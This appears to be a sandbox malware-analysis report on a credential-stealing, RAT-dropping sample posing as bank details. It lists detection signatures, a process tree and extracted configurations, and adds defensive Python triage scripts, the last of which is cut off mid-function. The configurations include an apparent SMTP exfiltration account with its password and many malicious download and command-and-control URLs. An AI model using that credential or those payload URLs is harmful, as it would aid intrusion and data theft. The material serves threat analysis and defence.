
Windows Analysis Report Foreign_Bank Account Details.exe

Overview

General Information

Sample Name:Foreign_Bank Account Details.exe
Analysis ID:1613
MD5:8906fa5fed7b1d3d2e5579d97419c076
SHA1:f4488a79fcb657eb1f3f23c6ce181ae7176fb11c
SHA256:d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9

Detection

Detected families: RemCom RemoteAdmin, Mimikatz, HawkEye, Imminent, Nanocore, Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected PasteDownloader
Detected Hacktool Mimikatz
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Ragnarok ransomware
Yara detected Globeimposter Ransomware
Yara detected Evrial Stealer
Yara detected Avaddon Ransomware
Yara detected GhostRat
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Koadic
Yara detected Jigsaw
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected Rapid ransomware
Yara detected RansomwareGeneric
Yara detected Ouroboros ransomware
Yara detected Fiesta Ransomware
Yara detected Lolkek Ransomware
Yara detected LimeRAT
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Yara detected TeslaCrypt Ransomware
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Crypt ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected ISRStealer
Yara detected LockBit ransomware
Yara detected LOCKFILE ransomware
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Niros Ransomware
Yara detected Buran Ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Detected Remcos RAT
Sigma detected: RegAsm connects to smtp port
Yara detected RevengeRAT
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected Parallax RAT
Yara detected GlobeLocker Ransomware
Yara detected Zeppelin Ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected AgentTesla
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Detected Nanocore Rat
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected CryLock ransomware
Yara detected Pony
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Zeoticus ransomware
Yara detected Porn Ransomware
Yara detected DarkSide Ransomware
Malicious sample detected (through community Yara rule)
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected WormLocker Ransomware
Yara detected Mailto ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Betabot
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected 0x0M4R Ransomware
Yara detected Growtopia
Yara detected Windows Security Disabler
Yara detected Amnesia ransomware
Yara detected Dorkbot
Contains VNC / remote desktop functionality (version string found)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Hides threads from debuggers
Writes to foreign memory regions
Yara detected MSILLoadEncryptedAssembly
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Sample is not signed and drops a device driver
Tries to harvest and steal browser information (history, passwords, etc)
Found string related to ransomware
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Modifies the hosts file
May drop file containing decryption instructions (likely related to ransomware)
Yara detected Autohotkey Downloader Generic
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Creates driver files
Checks if the current process is being debugged
May initialize a security null descriptor
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Uses SMTP (mail sending)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Foreign_Bank Account Details.exe (PID: 7880 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 8906FA5FED7B1D3D2E5579D97419C076)
    • RegAsm.exe (PID: 5916 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 2024 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 2664 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mpam-c45e5da5.exe (PID: 3480 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe' /q WD MD5: 443EE02E661D01299DEF051C2990B777)
    • MpSigStub.exe (PID: 3992 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.256.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • wevtutil.exe (PID: 7380 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • wevtutil.exe (PID: 6888 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mpam-f54ed867.exe (PID: 4540 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe MD5: 34B7B3BDFA61E18D3B2C3B0AC92B78EF)
    • MpSigStub.exe (PID: 7540 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • cleanup
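Three things in the tree above are worth checking mechanically rather than by eye: the RegAsm.exe child (PID 5916) carries the parent's own path as its command line, which is the footprint of a suspended child whose image was replaced; tKZVPq.exe in AppData\Roaming has exactly the MD5 of that RegAsm.exe, so the persistence copy is a byte-identical copy of whatever ran there; and the mpam-*.exe / MpSigStub.exe pair are Windows Defender definition-update packages and Microsoft's signature stub running from the NetworkService temp folder, not children of the sample, so they are sandbox-host noise. The script below is an added example, not part of the Joe Sandbox report; it parses the tree lines as printed above (a constructed copy, with the second tKZVPq.exe instance and the "cleanup" entry left out) and applies those three checks. The treatment of mpam-*.exe and MpSigStub.exe as noise is an assumption that holds only while they do not descend from the sample.

```python
import re
from collections import defaultdict

# Constructed input: the process-tree lines from the report above, indentation
# preserved (a raw string, so the Windows paths need no escaping).
PROCESS_TREE = r"""
  • System is w10x64native
  • Foreign_Bank Account Details.exe (PID: 7880 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 8906FA5FED7B1D3D2E5579D97419C076)
    • RegAsm.exe (PID: 5916 cmdline: 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 2024 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mpam-c45e5da5.exe (PID: 3480 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe' /q WD MD5: 443EE02E661D01299DEF051C2990B777)
    • MpSigStub.exe (PID: 3992 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.256.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
"""

LINE_RE = re.compile(
    r"^(?P<indent>\s*)• (?P<image>.+?) \(PID: (?P<pid>\d+) cmdline: "
    r"(?P<cmdline>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)

def parse_tree(text):
    """One dict per process (image, pid, cmdline, md5, ppid); the bullet
    indentation gives the parent/child relation."""
    procs, stack = [], []              # stack: (indent_width, pid) of open ancestors
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                      # "System is ..." and "cleanup" carry no PID
            continue
        depth = len(m.group("indent"))
        while stack and stack[-1][0] >= depth:
            stack.pop()
        proc = {"image": m.group("image"), "pid": int(m.group("pid")),
                "cmdline": m.group("cmdline"), "md5": m.group("md5").upper(),
                "ppid": stack[-1][1] if stack else None}
        procs.append(proc)
        stack.append((depth, proc["pid"]))
    return procs

def image_from_cmdline(cmdline):
    """Basename of the executable the command line names: a quoted first
    argument, or the first whitespace-delimited token."""
    if cmdline and cmdline[0] in "'\"":
        path = cmdline[1:].split(cmdline[0], 1)[0]
    else:
        path = cmdline.split(None, 1)[0]
    return path.replace("/", "\\").rsplit("\\", 1)[-1]

def hollowing_suspects(procs):
    """Processes whose image name differs from the executable in their own
    command line (the RegAsm.exe entry in this report)."""
    return [p for p in procs
            if image_from_cmdline(p["cmdline"]).lower() != p["image"].lower()]

def relocated_copies(procs):
    """MD5 values shared by differently named images: a binary copied under a
    new name (RegAsm.exe and the AppData\\Roaming tKZVPq.exe copy here)."""
    by_md5 = defaultdict(set)
    for p in procs:
        by_md5[p["md5"]].add(p["image"])
    return {h: names for h, names in by_md5.items() if len(names) > 1}

DEFENDER_UPDATE = re.compile(r"^(mpam-[0-9a-f]{8}\.exe|MpSigStub\.exe)$", re.I)

def descends_from(procs, pid, ancestor_pid):
    by_pid = {p["pid"]: p for p in procs}
    while pid is not None:
        if pid == ancestor_pid:
            return True
        pid = by_pid[pid]["ppid"]
    return False

def defender_update_noise(procs, sample_pid):
    """Assumption: Defender definition-update packages (mpam-*.exe) and the
    signature stub (MpSigStub.exe) run from the NetworkService temp folder by the
    VM itself are noise, but only while none of their ancestors is the sample."""
    return [p for p in procs
            if DEFENDER_UPDATE.match(p["image"])
            and "\\NETWOR~1\\AppData\\Local\\Temp\\" in p["cmdline"]
            and not descends_from(procs, p["pid"], sample_pid)]

def triage(text):
    procs = parse_tree(text)
    sample_pid = procs[0]["pid"]       # the submitted sample is the first entry
    noise = defender_update_noise(procs, sample_pid)
    return {
        "hollowing": [(p["image"], p["pid"]) for p in hollowing_suspects(procs)],
        "relocated_copies": relocated_copies(procs),
        "noise_pids": sorted(p["pid"] for p in noise),
        "processes_of_interest": sorted(p["pid"] for p in procs if p not in noise),
    }

if __name__ == "__main__":
    import json
    print(json.dumps(triage(PROCESS_TREE), indent=2, default=sorted))
```

The same parser works on any Joe Sandbox process tree pasted in this form; what changes per report is the noise rule, which should stay narrow (image name, NetworkService temp path and no descent from the sample) so that a sample that itself drops a file named like an update package is not silently discarded.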

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}

Threatname: Pony

{"C2 list": ["http://www.trotux.com/?z=", "http://www.zhongsou.com/kefu/zskf.htm", "http://www.w3.org/1999/xsl/transform", "http://evanstechnology.com", "http://41.59.0.100/intranet", "http://www.microsoft.com", "http://www.direct-ip.com/", "http://downloadfilesldr.com/index5.php?adv=141", "http://spywaresoftstop.com/download/141/setup.exe", "http://service.srvmd6.com/Mac/getInstallerSettings/?version=", "http://gveejlsffxmfjlswjmfm.com/files/", "http://so1.5k5.net/interface?action=install&p=", "http://thespecsupportservice.com/uno.dat", "http://110.42.4.180:", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://aindonashi.blogspot.com/", "http://www.alibaba.com", "http://(www|corail)\\\\.sudoc", "http://downloadfilesldr.com/index2.php?adv=141", "http://santasalete.sp.gov.br/jss/", "http://acayipbiri.blogspot.com/", "http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/", "http://xn--", "http://a.pomf.cat/", "http://cicahroti.blogspot.com/ ", "http://22y456.com/", "http://my-speak.eu/csioj.exe", "http://babukq4e2p4wu4iq.onion", "http://62.210.214.", "http://articlunik.blogspot.com/", "http://spotdewasa.blogspot.com/", "http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/", "http://www.nytimes.com", "http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=", "http://d1.downxia.net/products/", "http://www.gamedanji.cn/ExeIni", "http://aitimatafb.blogspot.com/", "http://berkah2013.blogspot.com/", "http://bigboobsp.blogspot.com/ ", "http://aspeja.org/question/", "http://www.apple.com", "http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/", "http://microhelptech.com/gotoassist/", "http://pastebin.com/", "http://www.fastclick.com", "http://errors.statsmyapp.com", "http://gicia.info/cd/cd.php?id=%s&ver=g", "http://musah.info/", "http://%s/buy_online.php", "http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung", "http://www.tripod.com", "http://batrasiaku.blogspot.com/", 
"http://gaigoixxx.blogspot.com/ ", "http://www.sqwire.com", "http://arthisoft.blogspot.com/ ", "http://www.steelbendersrfq.cf/", "http://gg", "http://www.", "http://yamaofficial.com/rxuczm/3415201.png", "http://www.xanga.com", "http://www.cnn.com", "http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/", "http://wmwifbajxxbcxmucxmlc.com/files/", "http://81.177.26.20/ayayay", "http://i.compucrush.com/i.php", "http://jugnitv.com/final.jpg", "http://www.consumerinput.com/", "http://104.236.94.", "http://cl.1ck.me/", "http://seuufhehfueughek.ws/", "http://bonkersmen.blogspot.com/", "http://www.j.mp/", "http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe", "http://www.mlb.com", "http://www.friskypotato.com/", "http://tumicy.com/plqijcndwoisdhsaow/", "http://pages", "http://www.yahoo.com", "http://whatami.us.to/tc", "http://darkside", "http://www.monster.com", "http://www.netscape.com", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://200.74.240.151/saturno/w8.txt", "http://downloadfilesldr.com/index4.php?adv=141", "http://download.zhongsou.com/cdsearch/", "http://spywaresoftstop.com/wfdfdghfdghj.htm", "http://brembotembo.com/doc.xls", "http://cts.hotbar.com/trackedevent.aspx", "http://%s/sync.php", "http://31.192.210.", "http://chemgioaz.blogspot.com/ ", "http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/", "http://203.199.200.61", "http://www.alexa.com", "http://www.microsoft.com0", "http://8nasrcity.blogspot.com/ ", "http://www.bookiq.bsnl.co.in/data_entry/circulars/m", "http://mydirecttube.com/", "http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/", "http://aolopdephn.blogspot.com/", "http://faithhotelghana.com", "http://94.102.14.", "http://www.diannaowang.com:8080", "http://200.74.240.151/saturno/w7.txt", "http://www.searchmaid.com/", "http://www.moliv.com.br/stat/email0702/", "http://%s%simg.jpg", "http://gosgd.com", "http://owwwc.com/mm/", "http://pig.zhongsou.com/helpsimple/help.htm", 
"http://avnisevinc.blogspot.com/", "http://hostthenpost.org/uploads/", "http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/", "http://www.lycos.com", "http://192.189.25.17/cgbin/ukbros", "http://208.95.104.", "http://tempuri.org/", "http://afkar.today/test_coming.training/w_f/", "http://tsrv4.ws/", "http://%domain%/config.php", "http://dl.dropbox.com/u/", "http://www.klikspaandelft.nl/", "http://cs.zhongsou.com/", "http://mitotl.com.mx/ups.com/", "http://%s", "http://autothich.blogspot.com/ ", "http://march262020.com/files/", "http://www.pornpassmanager.com/d", "http://www.icq.com", "http://%domain%/update.php", "http://%s:%i%s", "http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname", "http://tool.world2.cn/toolbar/", "http://coltaddict.blogspot.com/", "http://alindaenua.blogspot.com/", "http://tinyurl.com/", "http://www.virtrigger.com", "http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/", "http://www.niudoudou.com/web/download/", "http://millennium-traders.info", "http://www.youndoo.com/?z=", "http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a", "http://200.159.128.", "http://1bestgate.blogspot.com/ ", "http://www.preyer.it/ups.com/", "http://www.adserver.com", "http://5starvideos.com/main/", "http://march262020.club/files/", "http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&dyfm=cpjyicit", "http://www.surprisingdd.top", "http://www.facebook.com/", "http://agressor58.blogspot.com/", "http://arifkacip.blogspot.com/ ", "http://95.173.183.", "http://bittupadam.blogspot.com/", "http://94.103.85.236/ds/11.gif", "http://www.%domain%/updates/check.html", "http://srmvx.com.br/uploads/", "http://webpatch.ragnarok.co.kr/", "http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/", "http://alhalm-now.blogspot.com/", "http://fateh.aba.ae/abc.zip", 
"http://abeidaman.blogspot.com/ ", "http://131.153.38.125/", "http://www.amazon.com", "http://%s/support.php", "http://50.63.128.", "http://animefrase.blogspot.com/", "http://booknology.com/", "http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/", "http://bgtc.pctonics.com", "http://rentalhabneew.com/", "http://maldonaaloverainc.com/", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk", "http://batysnewskz.kz/ups.com", "http://61.19.253.", "http://downloadfilesldr.com/index3.php?adv=141", "http://%s:%d/%d%s", "http://179.43.158.187/PhtJFr0fvBk2.php", "http://spywaresoftstop.com/load.php?adv=141", "http://wevx.xyz/post.php?uid=", "http://dontkillme/", "http://activecodec.0fees.net/codec/mp3/codec_download.htm", "http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php", "http://highpay.website/css/windows.jar", "http://update.7h4uk.com:443/antivirus.php", "http://update.xiaoshoupeixun.com/tsbho.ini", "http://hotedeals.co.uk/ekck095032/", "http://gosgd2.com", "http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php", "http://sameshitasiteverwas.com/traf/tds/in.cgi", "http://ahmad-roni.blogspot.com/", "http://citw-vol2.blogspot.com/ ", "http://%s:%d/%s%d%08d", "http://kolyherqylwa9ru.top/log.php?f=400\",zigmep0());ixunlaw4=samagsi0[awolgify4()]();ypjatlaci6[ygulsivko6()]=krubyfacifv2();erqylwa9=samagsi0[hojmed4()];geqilra0=wmetoqe0[betyquzt6()];}ixunlaw4=ypjatlaci6[azgorpydbibd4()]();ixunlaw4=ypjatlaci6[ildig0()](erqylwa9);ixunlaw4=ypjatlaci6[onesothaz0()](kqoctim8+lcacsovy5);ixunlaw4=ypjatlaci6[oxkucfur4()]();ixunlaw4=iliqof8[agajdojj9()](rpolje4()+kqoctim8+lcacsovy5,zigmep0());}catch(e){}", "http://f1visa.info/cd/cd.php?id=%s&ver=g", "http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung", "http://cvfanatic.blogspot.com/ ", "http://www.qq994455.com/", 
"http://20vp.cn/moyu/", "http://www.ebay.com", "http://fateh.aba.ae/xyzx.zip", "http://3dplayful.blogspot.com/ ", "http://vequiato.sites.uol.com.br/", "http://malikberry.com/files101/htamandela.hta", "http://bbc.lumpens.org/", "http://verticalagriculture.net/files/csrss.jar", "http://31.192.209.", "http://31.192.211.", "http://lo0oading.blogspot.com/ ", "http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=", "http://best4hack.blogspot.com/ ", "http://www.mapquest.com", "http://ip-api.com/json/", "http://888888.2288.org/Monitor_INI", "http://te.platrium.com/pte.aspx", "http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com\"target=\"_blank", "http://config.juezhao123.com/c.ashx?ver=&c=", "http://brembotembo.com/2.dat", "http://%s:%i%s?mod=cmd", "http://detayworx.com/_vsnpNgyXp84Os8Xh.php", "http://checkip.dyndns.org/", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://www.nba.com", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://www.agendagyn.com/media/fotos/2010/", "http://www.thon-samson.be/js/_notes/", "http://anomaniez.blogspot.com/ ", "http://masgiO.info/cd/cd.php?id=%s&ver=g", "http://binyousafindustries.com/fonts/jo/mops.exe", "http://%s/features.php", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e", "http://92.222.7.", "http://brembotembo.com/1.dat", "http://ow.ly/QoHbJ", "http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d", "http://aancyber77.blogspot.com/", "http://2010-kpss.blogspot.com/ ", "http://www.sacbarao.kinghost.net/", "http://downloadfilesldr.com/allfile.jpg", "http://5starvideos.com/main/K", "http://sf3q2wrq34.ddns.net", "http://www.ip2location.com/", 
"http://88888888.7766.org/ExeIni", "http://worm.ws/", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw", "http://dudethisishowwedoitallnightlong.2myip.net", "http://dmww.dmcast.com/script/update.asp?version=%s", "http://docs.herobo.com", "http://directplugin.com/dialers/", "http://www.xpassgenerator.com/software/d"]}
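The "C2 list" above is a string carve, not a verified command-and-control list: it mixes printf-style templates (`http://%s/sync.php`), substitution placeholders (`%domain%`, `$__GUID`), IP prefixes cut mid-octet (`http://31.192.210.`), XML namespaces and vendor URLs (`www.w3.org`, `www.microsoft.com`, `tempuri.org`), bare fragments (`http://gg`, `http://www.`) and JavaScript that the extractor ran into (`kolyherqylwa9ru.top/log.php?f=400",zigmep0());...`), alongside a few entries that look like real infrastructure (an .onion host, `my-speak.eu/csioj.exe`, `200.74.240.151/saturno/w8.txt`). The CryLock "Extensions" field further down has the same character, being a run of Microsoft Defender detection names. Feeding either blob to a blocklist unfiltered would block Microsoft and W3C hosts. The script below is an added example, not part of the report or of any extractor; it runs over a constructed subset of the list in the report's own JSON shape and sorts entries into buckets before any host is considered for blocking. The benign-host allowlist is an assumption and would be tuned per environment.

```python
import ipaddress
import json
import re
from urllib.parse import urlsplit

# Constructed input: a subset of the "C2 list" from the Pony configuration
# above, kept in the JSON shape the report uses.
PONY_CONFIG = json.loads(r'''{"C2 list": [
  "http://www.microsoft.com", "http://www.w3.org/1999/xsl/transform", "http://tempuri.org/",
  "http://%s/sync.php", "http://%domain%/config.php",
  "http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG",
  "http://31.192.210.", "http://www.", "http://gg", "http://darkside",
  "http://babukq4e2p4wu4iq.onion", "http://my-speak.eu/csioj.exe",
  "http://200.74.240.151/saturno/w8.txt", "http://cicahroti.blogspot.com/ ",
  "http://kolyherqylwa9ru.top/log.php?f=400\",zigmep0());ixunlaw4=samagsi0[awolgify4()]();"
]}''')

# Assumption (not from the report): hosts the extractor routinely pulls out of
# benign strings (XML namespaces, vendor URLs, public lookup services). They
# are not attacker infrastructure and must never reach a blocklist.
NOT_ATTACKER_INFRA = {"www.microsoft.com", "www.w3.org", "tempuri.org",
                      "www.apple.com", "ip-api.com", "checkip.dyndns.org"}

TEMPLATE_RE = re.compile(r"%[sdi]|%\w+%|\$__\w+")   # printf / substitution placeholders
JUNK_CHARS = set('"\'{};<>')                        # never present in a cleanly carved URL

def classify(url):
    url = url.strip()
    if TEMPLATE_RE.search(url):
        return "template"            # a format string the malware fills at runtime
    if JUNK_CHARS & set(url):
        return "junk"                # the carve ran on into script or data
    parts = urlsplit(url)
    host = parts.hostname or ""
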